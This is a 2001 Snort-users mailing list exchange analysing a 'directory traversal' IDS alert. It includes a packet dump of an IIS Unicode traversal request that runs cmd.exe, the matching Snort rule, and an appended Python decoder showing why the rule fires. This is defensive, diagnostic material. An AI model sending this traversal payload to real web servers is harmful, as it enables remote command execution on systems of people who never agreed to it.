[Snort-users] Directory Traversal

Jim Kipp jkipp5 at ...530...
Mon Oct 1 16:06:13 EDT 2001


I think you are right here. Definitely some kind of IIS rule.  But here
is the packet: (one of many)
--
[**] WEB-MISC http directory traversal [**]
09/30-06:45:05.371371 0:50:73:1:6C:A8 -> 0:60:8:38:86:FA type:0x800
len:0x96
24.83.x.x:3542 -> 192.168.x.x:80 TCP TTL:114 TOS:0x0 ID:32972 IpLen:20
DgmLen:136 DF
***AP*** Seq: 0xF6922490  Ack: 0x7E168448  Win: 0x4470  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65  5c../winnt/syste
6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64  m32/cmd.exe?/c+d
69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48  ir r HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65  ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A        ction: close..
Erek Adams wrote:
> 
> On Sun, 30 Sep 2001, Jim Kipp wrote:
> 
> > Yes, I know where the rule is, but I still don't know what it is exactly
> > for. It does look IIS related, because in the payload there are GET
> > ../cmd.exe blah blah
> 
> If the rule you're referring to is:
> 
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-MISC http directory
> traversal"; flags: A+; content: "..\\";reference:arachnids,298;
> classtype:attempted-recon; sid:1112; rev:1;)
> 
> Then it translates into:  Someone used URL with "..\\" in it.  If it's got
> cmd.exe tacked onto it, I'd say it is something like CR or Nimda.
> 
> Could you post the packet payload?  Sanitized of course! :)
> 
> -----
> Erek Adams
> Nifty-Type-Guy
> TheAdamsFamily.Net
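The alert above fires on the rule's content "..\\" even though the raw request contains "..%5c" rather than a literal backslash, because Snort's HTTP decoding normalizes percent-encoded bytes before the content match runs. The following added example (not part of the original post or of Snort) decodes the hex column of the packet dump quoted in the message and shows which traversal tokens a raw content match would see versus a match after percent-decoding; the function and constant names are assumptions.

```python
from urllib.parse import unquote

# Hex column of the payload dump quoted above (ASCII column dropped).
PAYLOAD_HEX = """
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25
35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65
6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64
69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A
"""

# Tokens the rule family looks for: backslash form (sid 1112) and slash form.
TRAVERSAL_TOKENS = ("..\\", "../")

def hexdump_to_bytes(dump: str) -> bytes:
    """Turn the whitespace-separated hex column of a dump into raw bytes."""
    return bytes(int(tok, 16) for tok in dump.split())

def request_target(payload: bytes) -> str:
    """Return the request-target from the first line (METHOD SP target SP version)."""
    first_line = payload.split(b"\r\n", 1)[0].decode("latin-1")
    parts = first_line.split(" ")
    if len(parts) < 2:
        raise ValueError("not an HTTP request line")
    return parts[1]

def traversal_hits(target: str) -> dict:
    """Report traversal tokens seen in the raw target and after decoding.

    The target is percent-decoded twice so double-encoded forms such as
    %255c are also normalized; the raw target is checked separately to show
    what a content-only match without HTTP decoding would see."""
    decoded = unquote(unquote(target))
    return {
        "raw": [t for t in TRAVERSAL_TOKENS if t in target],
        "decoded": [t for t in TRAVERSAL_TOKENS if t in decoded],
        "decoded_target": decoded,
    }

def analyze(dump: str) -> dict:
    """Full pipeline: hex dump -> bytes -> request-target -> traversal report."""
    return traversal_hits(request_target(hexdump_to_bytes(dump)))

if __name__ == "__main__":
    print(analyze(PAYLOAD_HEX))
```

For the quoted packet the raw target matches only "../", while the decoded target matches both "..\\" and "../", which is why a rule keyed on "..\\" still fires once decoding is applied.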
